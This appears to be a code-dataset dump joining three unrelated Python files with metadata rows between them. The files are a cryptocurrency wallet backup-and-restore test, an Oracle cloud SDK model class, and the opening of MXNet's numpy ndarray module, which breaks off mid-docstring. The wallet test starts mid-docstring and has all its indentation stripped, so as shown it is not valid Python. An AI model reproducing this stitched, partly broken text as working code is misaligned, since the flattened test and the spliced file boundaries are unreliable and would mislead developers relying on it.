4 nodes. 1 2 and 3 send transactions between each other,
fourth node is a miner.
1 2 3 each mine a block to start, then
Miner creates 100 blocks so 1 2 3 each have 50 mature
coins to spend.
Then 5 iterations of 1/2/3 sending coins amongst
themselves to get transactions in the wallets,
and the miner mining one block.
Wallets are backed up using dumpwallet/backupwallet.
Then 5 more iterations of transactions and mining a block.
Miner then generates 101 more blocks, so any
transaction fees paid mature.
Sanity check:
Sum(1,2,3,4 balances) == 114*50
1/2/3 are shutdown, and their wallets erased.
Then restore using wallet.dat backup. And
confirm 1/2/3/4 balances are same as before.
Shutdown again, restore using importwallet,
and confirm again balances are correct.
"""
from test_framework.test_framework import TcoinTestFramework
from test_framework.util import *
from random import randint
import logging
logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO, stream=sys.stdout)
class WalletBackupTest(TcoinTestFramework):
def __init__(self):
super().__init__()
self.setup_clean_chain = True
self.num_nodes = 4
# nodes 1, 2,3 are spenders, let's give them a keypool=100
self.extra_args = [["-keypool=100"], ["-keypool=100"], ["-keypool=100"], []]
# This mirrors how the network was setup in the bash test
def setup_network(self, split=False):
self.nodes = start_nodes(self.num_nodes, self.options.tmpdir, self.extra_args)
connect_nodes(self.nodes[0], 3)
connect_nodes(self.nodes[1], 3)
connect_nodes(self.nodes[2], 3)
connect_nodes(self.nodes[2], 0)
self.is_network_split=False
self.sync_all()
def one_send(self, from_node, to_address):
if (randint(1,2) == 1):
amount = Decimal(randint(1,10)) / Decimal(10)
self.nodes[from_node].sendtoaddress(to_address, amount)
def do_one_round(self):
a0 = self.nodes[0].getnewaddress()
a1 = self.nodes[1].getnewaddress()
a2 = self.nodes[2].getnewaddress()
self.one_send(0, a1)
self.one_send(0, a2)
self.one_send(1, a0)
self.one_send(1, a2)
self.one_send(2, a0)
self.one_send(2, a1)
# Have the miner (node3) mine a block.
# Must sync mempools before mining.
sync_mempools(self.nodes)
self.nodes[3].generate(1)
sync_blocks(self.nodes)
# As above, this mirrors the original bash test.
def start_three(self):
self.nodes[0] = start_node(0, self.options.tmpdir)
self.nodes[1] = start_node(1, self.options.tmpdir)
self.nodes[2] = start_node(2, self.options.tmpdir)
connect_nodes(self.nodes[0], 3)
connect_nodes(self.nodes[1], 3)
connect_nodes(self.nodes[2], 3)
connect_nodes(self.nodes[2], 0)
def stop_three(self):
stop_node(self.nodes[0], 0)
stop_node(self.nodes[1], 1)
stop_node(self.nodes[2], 2)
def erase_three(self):
os.remove(self.options.tmpdir + "/node0/regtest/wallet.dat")
os.remove(self.options.tmpdir + "/node1/regtest/wallet.dat")
os.remove(self.options.tmpdir + "/node2/regtest/wallet.dat")
def run_test(self):
logging.info("Generating initial blockchain")
self.nodes[0].generate(1)
sync_blocks(self.nodes)
self.nodes[1].generate(1)
sync_blocks(self.nodes)
self.nodes[2].generate(1)
sync_blocks(self.nodes)
self.nodes[3].generate(100)
sync_blocks(self.nodes)
assert_equal(self.nodes[0].getbalance(), 50)
assert_equal(self.nodes[1].getbalance(), 50)
assert_equal(self.nodes[2].getbalance(), 50)
assert_equal(self.nodes[3].getbalance(), 0)
logging.info("Creating transactions")
# Five rounds of sending each other transactions.
for i in range(5):
self.do_one_round()
logging.info("Backing up")
tmpdir = self.options.tmpdir
self.nodes[0].backupwallet(tmpdir + "/node0/wallet.bak")
self.nodes[0].dumpwallet(tmpdir + "/node0/wallet.dump")
self.nodes[1].backupwallet(tmpdir + "/node1/wallet.bak")
self.nodes[1].dumpwallet(tmpdir + "/node1/wallet.dump")
self.nodes[2].backupwallet(tmpdir + "/node2/wallet.bak")
self.nodes[2].dumpwallet(tmpdir + "/node2/wallet.dump")
logging.info("More transactions")
for i in range(5):
self.do_one_round()
# Generate 101 more blocks, so any fees paid mature
self.nodes[3].generate(101)
self.sync_all()
balance0 = self.nodes[0].getbalance()
balance1 = self.nodes[1].getbalance()
balance2 = self.nodes[2].getbalance()
balance3 = self.nodes[3].getbalance()
total = balance0 + balance1 + balance2 + balance3
# At this point, there are 214 blocks (103 for setup, then 10 rounds, then 101.)
# 114 are mature, so the sum of all wallets should be 114 * 50 = 5700.
assert_equal(total, 5700)
##
# Test restoring spender wallets from backups
##
logging.info("Restoring using wallet.dat")
self.stop_three()
self.erase_three()
# Start node2 with no chain
shutil.rmtree(self.options.tmpdir + "/node2/regtest/blocks")
shutil.rmtree(self.options.tmpdir + "/node2/regtest/chainstate")
# Restore wallets from backup
shutil.copyfile(tmpdir + "/node0/wallet.bak", tmpdir + "/node0/regtest/wallet.dat")
shutil.copyfile(tmpdir + "/node1/wallet.bak", tmpdir + "/node1/regtest/wallet.dat")
shutil.copyfile(tmpdir + "/node2/wallet.bak", tmpdir + "/node2/regtest/wallet.dat")
logging.info("Re-starting nodes")
self.start_three()
sync_blocks(self.nodes)
assert_equal(self.nodes[0].getbalance(), balance0)
assert_equal(self.nodes[1].getbalance(), balance1)
assert_equal(self.nodes[2].getbalance(), balance2)
logging.info("Restoring using dumped wallet")
self.stop_three()
self.erase_three()
#start node2 with no chain
shutil.rmtree(self.options.tmpdir + "/node2/regtest/blocks")
shutil.rmtree(self.options.tmpdir + "/node2/regtest/chainstate")
self.start_three()
assert_equal(self.nodes[0].getbalance(), 0)
assert_equal(self.nodes[1].getbalance(), 0)
assert_equal(self.nodes[2].getbalance(), 0)
self.nodes[0].importwallet(tmpdir + "/node0/wallet.dump")
self.nodes[1].importwallet(tmpdir + "/node1/wallet.dump")
self.nodes[2].importwallet(tmpdir + "/node2/wallet.dump")
sync_blocks(self.nodes)
assert_equal(self.nodes[0].getbalance(), balance0)
assert_equal(self.nodes[1].getbalance(), balance1)
assert_equal(self.nodes[2].getbalance(), balance2)
if __name__ == '__main__':
WalletBackupTest().main()
| 35.950739
| 95
| 0.653193
|
6bd64497e387e43a4da3be2dbb6229b5ba9400e8
| 2,453
|
py
|
Python
|
src/oci/core/models/change_vlan_compartment_details.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/core/models/change_vlan_compartment_details.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/core/models/change_vlan_compartment_details.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class ChangeVlanCompartmentDetails(object):
"""
The configuration details for the move operation.
"""
def __init__(self, **kwargs):
"""
Initializes a new ChangeVlanCompartmentDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param compartment_id:
The value to assign to the compartment_id property of this ChangeVlanCompartmentDetails.
:type compartment_id: str
"""
self.swagger_types = {
'compartment_id': 'str'
}
self.attribute_map = {
'compartment_id': 'compartmentId'
}
self._compartment_id = None
@property
def compartment_id(self):
"""
**[Required]** Gets the compartment_id of this ChangeVlanCompartmentDetails.
The `OCID`__ of the compartment to move the VLAN to.
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm
:return: The compartment_id of this ChangeVlanCompartmentDetails.
:rtype: str
"""
return self._compartment_id
@compartment_id.setter
def compartment_id(self, compartment_id):
"""
Sets the compartment_id of this ChangeVlanCompartmentDetails.
The `OCID`__ of the compartment to move the VLAN to.
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm
:param compartment_id: The compartment_id of this ChangeVlanCompartmentDetails.
:type: str
"""
self._compartment_id = compartment_id
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| 32.706667
| 245
| 0.68406
|
52dc9fb7a6852b0a667308db9c0d69875a62f564
| 148,758
|
py
|
Python
|
python/mxnet/numpy/multiarray.py
|
jonatanmil/incubator-mxnet
|
6af6570b065e1d4886621763777297eedb2fde84
|
[
"Apache-2.0"
] | null | null | null |
python/mxnet/numpy/multiarray.py
|
jonatanmil/incubator-mxnet
|
6af6570b065e1d4886621763777297eedb2fde84
|
[
"Apache-2.0"
] | 1
|
2021-12-10T01:33:49.000Z
|
2021-12-10T01:33:49.000Z
|
python/mxnet/numpy/multiarray.py
|
junhalba/incubator-mxnet-master
|
be7296bcaa104e333ac68e27d78576ceedc78d1f
|
[
"BSL-1.0",
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=too-many-lines, unused-argument
"""numpy ndarray and util functions."""
from __future__ import absolute_import
from __future__ import division
try:
from __builtin__ import slice as py_slice
except ImportError:
from builtins import slice as py_slice
from array import array as native_array
import sys
import ctypes
import warnings
import numpy as _np
from ..ndarray import NDArray, _DTYPE_NP_TO_MX, _GRAD_REQ_MAP
from ..ndarray import indexing_key_expand_implicit_axes, get_indexing_dispatch_code,\
get_oshape_of_gather_nd_op
from ..ndarray._internal import _set_np_ndarray_class
from . import _op as _mx_np_op
from ..base import check_call, _LIB, NDArrayHandle
from ..base import mx_real_t, c_array_buf, mx_uint, numeric_types, integer_types
from ..context import Context
from ..util import _sanity_check_params, set_module
from ..context import current_context
from ..ndarray import numpy as _mx_nd_np
from ..ndarray.numpy import _internal as _npi
__all__ = ['ndarray', 'empty', 'array', 'zeros', 'ones', 'full', 'add', 'subtract', 'multiply', 'divide',
'mod', 'remainder', 'power', 'sin', 'cos', 'tan', 'sinh', 'cosh', 'tanh', 'log10', 'sqrt', 'cbrt',
'abs', 'absolute', 'exp', 'expm1', 'arcsin', 'arccos', 'arctan', 'sign', 'log',
'degrees', 'log2', 'log1p', 'rint', 'radians', 'reciprocal', 'square', 'negative',
'fix', 'ceil', 'floor', 'trunc', 'logical_not', 'arcsinh', 'arccosh', 'arctanh',
'tensordot', 'linspace', 'expand_dims', 'tile', 'arange', 'split', 'concatenate',
'stack', 'mean', 'maximum', 'minimum', 'swapaxes', 'clip', 'argmax', 'std', 'var', 'indices', 'copysign',
'ravel']
# Return code for dispatching indexing function call
_NDARRAY_UNSUPPORTED_INDEXING = -1
_NDARRAY_BASIC_INDEXING = 0
_NDARRAY_ADVANCED_INDEXING = 1
# This function is copied from ndarray.py since pylint
# keeps giving false alarm error of undefined-all-variable
def _new_alloc_handle(shape, ctx, delay_alloc, dtype=mx_real_t):
"""Return a new handle with specified shape and context.
Empty handle is only used to hold results.
Returns
-------
handle
A new empty `ndarray` handle.
"""
hdl = NDArrayHandle()
check_call(_LIB.MXNDArrayCreateEx(
c_array_buf(mx_uint, native_array('I', shape)),
mx_uint(len(shape)),
ctypes.c_int(ctx.device_typeid),
ctypes.c_int(ctx.device_id),
ctypes.c_int(int(delay_alloc)),
ctypes.c_int(int(_DTYPE_NP_TO_MX[_np.dtype(dtype).type])),
ctypes.byref(hdl)))
return hdl
# Have to use 0 as default value for stype since pylint does not allow
# importing _STORAGE_TYPE_DEFAULT from ndarray.py.
def _np_ndarray_cls(handle, writable=True, stype=0):
if stype != 0:
raise ValueError('_np_ndarray_cls currently only supports default storage '
'type, while received stype = {}'.format(stype))
return ndarray(handle, writable=writable)
_set_np_ndarray_class(_np_ndarray_cls)
def _get_index(idx):
if isinstance(idx, NDArray) and not isinstance(idx, ndarray):
raise TypeError('Cannot have mx.nd.NDArray as index')
if isinstance(idx, ndarray):
return idx.as_nd_ndarray()
elif sys.version_info[0] > 2 and isinstance(idx, range):
return array(_np.arange(idx.start, idx.stop, idx.step, dtype=_np.int32)).as_nd_ndarray()
else:
return idx
_NUMPY_ARRAY_FUNCTION_DICT = {}
_NUMPY_ARRAY_UFUNC_DICT = {}
@set_module('mxnet.numpy') # pylint: disable=invalid-name
class ndarray(NDArray):
"""
An array object represents a multidimensional, homogeneous array of fixed-size items.
An associated data-type object describes the format of each element in the array
(its byte-order, how many bytes it occupies in memory, whether it is an integer, a
floating point number, or something else, etc.). Arrays should be constructed using
`array`, `zeros` or `empty`. Currently, only c-contiguous arrays are supported.
"""
@staticmethod
def __array_ufunc__(self, ufunc, method, *inputs, **kwargs): # pylint: disable=bad-staticmethod-argument
"""
Dispatch official NumPy unary/binary operator calls on mxnet.numpy.ndarray
to this function. The operators must comply with the ufunc definition in NumPy.
The following code is adapted from CuPy.
"""
if 'out' in kwargs:
# need to unfold tuple argument in kwargs
out = kwargs['out']
if len(out) != 1:
raise ValueError('The `out` parameter must have exactly one ndarray')
kwargs['out'] = out[0]
if method == '__call__':
if ufunc.signature is not None:
# we don't support generalised-ufuncs (gufuncs)
return NotImplemented
name = ufunc.__name__
mx_ufunc = _NUMPY_ARRAY_UFUNC_DICT.get(name, None)
if mx_ufunc is None:
raise ValueError('mxnet.numpy operator `{}` has not been registered in '
'the _NUMPY_ARRAY_UFUNC_LIST. Please make sure you are '
'using NumPy >= 1.15.0 and the operator implementation '
'is compatible with NumPy. Then add the operator name '
'to the list.'
.format(name))
return mx_ufunc(*inputs, **kwargs)
else:
return NotImplemented
@staticmethod
def __array_function__(self, func, types, args, kwargs): # pylint: disable=bad-staticmethod-argument
"""
Dispatch official NumPy operators that comply with the array function protocol to
this function.
"""
mx_np_func = _NUMPY_ARRAY_FUNCTION_DICT.get(func, None)
if mx_np_func is None:
raise ValueError('mxnet.numpy operator `{}` has not been registered in '
'the _NUMPY_ARRAY_FUNCTION_LIST. Please make sure you are '
'using NumPy >= 1.17.0 and the operator '
'implementation is compatible with NumPy. Then add '
'the operator name to the list.'.format(func))
# Note: this allows subclasses that don't override
# __array_function__ to handle mxnet.numpy.ndarray objects
if not all(issubclass(t, ndarray) for t in types):
return NotImplemented
return mx_np_func(*args, **kwargs)
def _get_np_basic_indexing(self, key):
"""
This function indexes ``self`` with a tuple of `slice` objects only.
"""
key_nd = tuple(idx for idx in key if idx is not None)
if len(key_nd) < self.ndim:
raise RuntimeError(
'too few indices after normalization: expected `ndim` ({}) '
'but got {}. This is a bug, please report it!'
''.format(self.ndim, len(key_nd))
)
if len(key_nd) > self.ndim:
raise IndexError(
'too many indices ({}) for array with {} dimensions'
''.format(len(key_nd), self.ndim)
)
none_axes = [ax for ax in range(len(key)) if key[ax] is None] # pylint: disable=invalid-name
slc_key, int_axes = self._basic_indexing_key_int_to_slice(key_nd)
new_axes = self._new_axes_after_basic_indexing(none_axes, key)
# Check bounds for integer axes
for ax in int_axes: # pylint: disable=invalid-name
if not -self.shape[ax] <= key_nd[ax] < self.shape[ax]:
raise IndexError(
'index {} is out of bounds for axis {} with size {}'
''.format(key_nd[ax], ax, self.shape[ax]))
if self._basic_indexing_slice_is_contiguous(slc_key, self.shape):
# Create a shared-memory view by using low-level flat slicing
flat_begin, flat_end = self._basic_indexing_contiguous_flat_begin_end(
slc_key, self.shape
)
handle = NDArrayHandle()
flat_self = self.reshape_view(-1)
check_call(
_LIB.MXNDArraySlice(
flat_self.handle,
mx_uint(flat_begin),
mx_uint(flat_end),
ctypes.byref(handle),
)
)
sliced_shape = self._basic_indexing_sliced_shape(slc_key, self.shape)
sliced = self.__class__(handle=handle, writable=self.writable)
if 0 in sliced_shape:
sliced = sliced.reshape(sliced_shape)
else:
sliced = sliced.reshape_view(sliced_shape)
else:
begin, end, step = self._basic_indexing_key_to_begin_end_step(
slc_key, self.shape, keep_none=True
)
sliced = _npi.slice(self, begin, end, step)
# Reshape to final shape due to integer and `None` entries in `key`.
final_shape = [sliced.shape[i] for i in range(sliced.ndim) if i not in int_axes]
for ax in new_axes: # pylint: disable=invalid-name
final_shape.insert(ax, 1)
if sliced.size == 0:
return sliced.reshape(tuple(final_shape))
else:
return sliced.reshape_view(tuple(final_shape))
def _get_np_advanced_indexing(self, key):
idcs, new_axes = self._get_index_nd(key)
if type(idcs) == NDArray: # pylint: disable=unidiomatic-typecheck
idcs = idcs.as_np_ndarray()
else:
idcs = _npi.stack(*[i if isinstance(i, self.__class__) else i.as_np_ndarray() for i in idcs])
sliced = _npi.gather_nd(self, idcs)
# Reshape due to `None` entries in `key`.
if new_axes:
final_shape = [sliced.shape[i] for i in range(sliced.ndim)]
for ax in new_axes: # pylint: disable=invalid-name
final_shape.insert(ax, 1)
return sliced.reshape(tuple(final_shape))
else:
return sliced
def _set_np_advanced_indexing(self, key, value):
"""This function is called by __setitem__ when key is an advanced index."""
idcs, new_axes = self._get_index_nd(key)
if type(idcs) == NDArray: # pylint: disable=unidiomatic-typecheck
idcs = idcs.as_np_ndarray()
else:
idcs = _npi.stack(*[i if isinstance(i, self.__class__) else i.as_np_ndarray() for i in idcs])
vshape = get_oshape_of_gather_nd_op(self.shape, idcs.shape)
value_nd = self._prepare_value_nd(value, bcast_shape=vshape, squeeze_axes=new_axes)
self._scatter_set_nd(value_nd, idcs)
# pylint: disable=too-many-return-statements
def __getitem__(self, key):
"""
Overriding the method in NDArray class in a numpy fashion.
Calling numpy ndarray's _get_np_basic_indexing(key) and _get_np_advanced_indexing(key).
"""
ndim = self.ndim
shape = self.shape
if ndim == 0:
if key != ():
raise IndexError('scalar tensor can only accept `()` as index')
# Handle simple cases for higher speed
if isinstance(key, tuple) and len(key) == 0:
return self
if isinstance(key, tuple) and len(key) == ndim\
and all(isinstance(idx, integer_types) for idx in key):
out = self
for idx in key:
out = out[idx]
return out
if isinstance(key, integer_types):
if key > shape[0] - 1:
raise IndexError(
'index {} is out of bounds for axis 0 with size {}'.format(
key, shape[0]))
return self._at(key)
elif isinstance(key, py_slice):
if key.step is None or key.step == 1:
if key.start is not None or key.stop is not None:
return self._slice(key.start, key.stop)
else:
return self
elif key.step == 0:
raise ValueError("slice step cannot be zero")
key = indexing_key_expand_implicit_axes(key, self.shape)
indexing_dispatch_code = get_indexing_dispatch_code(key)
if indexing_dispatch_code == _NDARRAY_BASIC_INDEXING:
return self._get_np_basic_indexing(key)
elif indexing_dispatch_code == _NDARRAY_ADVANCED_INDEXING:
return self._get_np_advanced_indexing(key)
else:
raise RuntimeError
def __setitem__(self, key, value):
"""
x.__setitem__(i, y) <=> x[i]=y
Sets ``self[key]`` to ``value``.
Overriding the method in NDArray class in a numpy fashion.
"""
if isinstance(value, NDArray) and not isinstance(value, ndarray):
raise TypeError('Cannot assign mx.nd.NDArray to mxnet.numpy.ndarray')
if self.ndim == 0:
if not isinstance(key, tuple) or len(key) != 0:
raise IndexError('scalar tensor can only accept `()` as index')
if isinstance(value, numeric_types):
self.full(value)
elif isinstance(value, ndarray) and value.size == 1:
if value.shape != self.shape:
value = value.reshape(self.shape)
value.copyto(self)
elif isinstance(value, (_np.ndarray, _np.generic)) and value.size == 1:
if isinstance(value, _np.generic) or value.shape != self.shape:
value = value.reshape(self.shape)
self._sync_copyfrom(value)
else:
raise ValueError('setting an array element with a sequence.')
else:
key = indexing_key_expand_implicit_axes(key, self.shape)
slc_key = tuple(idx for idx in key if idx is not None)
if len(slc_key) < self.ndim:
raise RuntimeError(
'too few indices after normalization: expected `ndim` ({}) '
'but got {}. This is a bug, please report it!'
''.format(self.ndim, len(slc_key))
)
if len(slc_key) > self.ndim and self.ndim != 0:
raise IndexError(
'too many indices ({}) for array with {} dimensions'
''.format(len(slc_key), self.ndim)
)
indexing_dispatch_code = get_indexing_dispatch_code(slc_key)
if indexing_dispatch_code == _NDARRAY_BASIC_INDEXING:
self._set_nd_basic_indexing(key, value) # function is inheritated from NDArray class
elif indexing_dispatch_code == _NDARRAY_ADVANCED_INDEXING:
self._set_np_advanced_indexing(key, value)
else:
raise ValueError(
'Indexing NDArray with index {} of type {} is not supported'
''.format(key, type(key))
)
def _prepare_value_nd(self, value, bcast_shape, squeeze_axes=None):
"""Return a broadcast `ndarray` with same context and dtype as ``self``.
For setting item, The returned `ndarray` is squeezed according to squeeze_axes since the
value_nd is assigned to not yet expanded space in original array.
`value`: numeric types or array like.
`bcast_shape`: a shape tuple.
`squeeze_axes`: a sequence of axes to squeeze in the value array.
Note: mxnet.numpy.ndarray not support NDArray as assigned value.
"""
if isinstance(value, numeric_types):
value_nd = full(bcast_shape, value, ctx=self.ctx, dtype=self.dtype)
elif isinstance(value, self.__class__):
value_nd = value.as_in_ctx(self.ctx)
if value_nd.dtype != self.dtype:
value_nd = value_nd.astype(self.dtype)
else:
try:
value_nd = array(value, ctx=self.ctx, dtype=self.dtype)
except:
raise TypeError('mxnet.np.ndarray does not support assignment with non-array-like '
'object {} of type {}'.format(value, type(value)))
# For advanced indexing setitem, if there is None in indices, we need to squeeze the
# assigned value_nd since None is also ignored in slicing the original array.
if squeeze_axes and value_nd.ndim > len(bcast_shape):
squeeze_axes = tuple([ax for ax in squeeze_axes if ax < len(value_nd.shape)])
value_nd = value_nd.squeeze(axis=tuple(squeeze_axes))
# handle the cases like the following
# a = np.zeros((3, 3)), b = np.ones((1, 1, 1, 1, 3)), a[0] = b
# b cannot broadcast directly to a[0].shape unless its leading 1-size axes are trimmed
if value_nd.ndim > len(bcast_shape):
squeeze_axes = []
for i in range(value_nd.ndim - len(bcast_shape)):
if value_nd.shape[i] == 1:
squeeze_axes.append(i)
else:
break
if squeeze_axes:
value_nd = value_nd.squeeze(squeeze_axes)
if value_nd.shape != bcast_shape:
if value_nd.size == 0:
value_nd = value_nd.reshape(bcast_shape)
else:
value_nd = value_nd.broadcast_to(bcast_shape)
return value_nd
def __add__(self, other):
"""x.__add__(y) <=> x + y"""
return add(self, other)
def __iadd__(self, other):
"""x.__iadd__(y) <=> x += y"""
if not self.writable:
raise ValueError('trying to add to a readonly ndarray')
return add(self, other, out=self)
def __sub__(self, other):
"""x.__sub__(y) <=> x - y"""
return subtract(self, other)
def __isub__(self, other):
"""x.__isub__(y) <=> x -= y"""
if not self.writable:
raise ValueError('trying to subtract from a readonly ndarray')
return subtract(self, other, out=self)
def __rsub__(self, other):
"""x.__rsub__(y) <=> y - x"""
return subtract(other, self)
def __mul__(self, other):
"""x.__mul__(y) <=> x * y"""
return multiply(self, other)
def __neg__(self):
return self.__mul__(-1.0)
def __imul__(self, other):
"""x.__imul__(y) <=> x *= y"""
if not self.writable:
raise ValueError('trying to add to a readonly ndarray')
return multiply(self, other, out=self)
def __rmul__(self, other):
"""x.__rmul__(y) <=> y * x"""
return self.__mul__(other)
def __div__(self, other):
raise AttributeError('ndarray.__div__ is replaced by __truediv__. If you are using'
' Python2, please use the statement from __future__ import division'
' to change the / operator to mean true division throughout the'
' module. If you are using Python3, this error should not have'
' been encountered.')
def __rdiv__(self, other):
raise AttributeError('ndarray.__rdiv__ is replaced by __rtruediv__. If you are using'
' Python2, please use the statement from __future__ import division'
' to change the / operator to mean true division throughout the'
' module. If you are using Python3, this error should not have'
' been encountered.')
def __idiv__(self, other):
raise AttributeError('ndarray.__idiv__ is replaced by __irtruediv__. If you are using'
' Python2, please use the statement from __future__ import division'
' to change the / operator to mean true division throughout the'
' module. If you are using Python3, this error should not have'
' been encountered.')
def __truediv__(self, other):
"""x.__truediv__(y) <=> x / y"""
return divide(self, other)
def __rtruediv__(self, other):
"""x.__rtruediv__(y) <=> y / x"""
return divide(other, self)
def __itruediv__(self, other):
return divide(self, other, out=self)
def __mod__(self, other):
"""x.__mod__(y) <=> x % y"""
return mod(self, other)
def __rmod__(self, other):
"""x.__rmod__(y) <=> y % x"""
return mod(other, self)
def __imod__(self, other):
"""x.__imod__(y) <=> x %= y"""
return mod(self, other, out=self)
def __pow__(self, other):
"""x.__pow__(y) <=> x ** y"""
return power(self, other)
def __rpow__(self, other):
"""x.__rpow__(y) <=> y ** x"""
return power(other, self)
def __eq__(self, other):
"""x.__eq__(y) <=> x == y"""
# TODO(junwu): Return boolean ndarray when dtype=bool_ is supported
if isinstance(other, ndarray):
return _npi.equal(self, other)
elif isinstance(other, numeric_types):
return _npi.equal_scalar(self, float(other))
else:
raise TypeError("ndarray does not support type {} as operand".format(str(type(other))))
def __hash__(self):
raise NotImplementedError
def __ne__(self, other):
"""x.__ne__(y) <=> x != y"""
# TODO(junwu): Return boolean ndarray when dtype=bool_ is supported
if isinstance(other, ndarray):
return _npi.not_equal(self, other)
elif isinstance(other, numeric_types):
return _npi.not_equal_scalar(self, float(other))
else:
raise TypeError("ndarray does not support type {} as operand".format(str(type(other))))
def __gt__(self, other):
"""x.__gt__(y) <=> x > y"""
# TODO(junwu): Return boolean ndarray when dtype=bool_ is supported
if isinstance(other, ndarray):
return _npi.greater(self, other)
elif isinstance(other, numeric_types):
return _npi.greater_scalar(self, float(other))
else:
raise TypeError("ndarray does not support type {} as operand".format(str(type(other))))
def __ge__(self, other):
"""x.__ge__(y) <=> x >= y"""
# TODO(junwu): Return boolean ndarray when dtype=bool_ is supported
if isinstance(other, ndarray):
return _npi.greater_equal(self, other)
elif isinstance(other, numeric_types):
return _npi.greater_equal_scalar(self, float(other))
else:
raise TypeError("ndarray does not support type {} as operand".format(str(type(other))))
def __lt__(self, other):
"""x.__lt__(y) <=> x < y"""
# TODO(junwu): Return boolean ndarray when dtype=bool_ is supported
if isinstance(other, ndarray):
return _npi.less(self, other)
elif isinstance(other, numeric_types):
return _npi.less_scalar(self, float(other))
else:
raise TypeError("ndarray does not support type {} as operand".format(str(type(other))))
def __le__(self, other):
"""x.__le__(y) <=> x <= y"""
# TODO(junwu): Return boolean ndarray when dtype=bool_ is supported
if isinstance(other, ndarray):
return _npi.less_equal(self, other)
elif isinstance(other, numeric_types):
return _npi.less_equal_scalar(self, float(other))
else:
raise TypeError("ndarray does not support type {} as operand".format(str(type(other))))
def __bool__(self):
num_elements = self.size
if num_elements == 0:
warnings.simplefilter('default')
warnings.warn('The truth value of an empty array is ambiguous. Returning False, but in'
' future this will result in an error.', DeprecationWarning)
return False
elif num_elements == 1:
return bool(self.item())
else:
raise ValueError("The truth value of an ndarray with multiple elements is ambiguous.")
__nonzero__ = __bool__
def __float__(self):
num_elements = self.size
if num_elements != 1:
raise TypeError('only size-1 arrays can be converted to Python scalars')
return float(self.item())
def __int__(self):
num_elements = self.size
if num_elements != 1:
raise TypeError('only size-1 arrays can be converted to Python scalars')
return int(self.item())
def __len__(self):
"""Number of elements along the first axis."""
shape = self.shape
if len(shape) == 0:
raise TypeError('len() of unsized object')
return self.shape[0]
def __reduce__(self):
return ndarray, (None,), self.__getstate__()
def item(self, *args):
"""Copy an element of an array to a standard Python scalar and return it.
Parameters
----------
*args : Arguments (variable number and type)
none: in this case, the method only works for arrays with one element (a.size == 1),
which element is copied into a standard Python scalar object and returned.
int_type: this argument is interpreted as a flat index into the array, specifying which
element to copy and return.
tuple of int_types: functions as does a single int_type argument, except that the
argument is interpreted as an nd-index into the array.
Returns
-------
z : Standard Python scalar object
A copy of the specified element of the array as a suitable Python scalar.
"""
# TODO(junwu): no need to call asnumpy() on the whole array.
return self.asnumpy().item(*args)
@property
# pylint: disable= invalid-name, undefined-variable
def T(self):
"""Same as self.transpose(). This always returns a copy of self."""
return self.transpose()
# pylint: enable= invalid-name, undefined-variable
def all(self, axis=None, out=None, keepdims=False):
raise NotImplementedError
def any(self, axis=None, out=None, keepdims=False):
raise NotImplementedError
def as_nd_ndarray(self):
"""Convert mxnet.numpy.ndarray to mxnet.ndarray.NDArray to use its fluent methods."""
hdl = NDArrayHandle()
check_call(_LIB.MXShallowCopyNDArray(self.handle, ctypes.byref(hdl)))
return NDArray(handle=hdl, writable=self.writable)
def as_np_ndarray(self):
"""A convenience function for creating a numpy ndarray from the current ndarray
with zero copy. For this class, it just returns itself since it's already a
numpy ndarray."""
return self
def __repr__(self):
"""
Returns a string representation of the array. The dtype of the ndarray will not
be appended to the string if it is `float32`. The context of the ndarray will
be appended for devices other than CPU.
Examples
--------
>>> from mxnet import np, npx
>>> a = np.random.uniform(size=(2, 3))
>>> a
array([[0.5488135 , 0.5928446 , 0.71518934],
[0.84426576, 0.60276335, 0.8579456 ]])
>>> print(a)
[[0.5488135 0.5928446 0.71518934]
[0.84426576 0.60276335 0.8579456 ]]
>>> a.dtype
<class 'numpy.float32'>
>>> b = a.astype(np.float64)
>>> b
array([[0.54881352, 0.59284461, 0.71518934],
[0.84426576, 0.60276335, 0.85794562]], dtype=float64)
>>> print(b)
[[0.54881352 0.59284461 0.71518934]
[0.84426576 0.60276335 0.85794562]]
>>> b.dtype
<class 'numpy.float64'>
>>> c = a.copyto(npx.gpu(0))
>>> c
array([[0.5488135 , 0.5928446 , 0.71518934],
[0.84426576, 0.60276335, 0.8579456 ]], ctx=gpu(0))
>>> print(c)
[[0.5488135 0.5928446 0.71518934]
[0.84426576 0.60276335 0.8579456 ]] @gpu(0)
>>> d = b.copyto(npx.gpu(0))
>>> d
array([[0.54881352, 0.59284461, 0.71518934],
[0.84426576, 0.60276335, 0.85794562]], dtype=float64, ctx=gpu(0))
>>> print(d)
[[0.54881352 0.59284461 0.71518934]
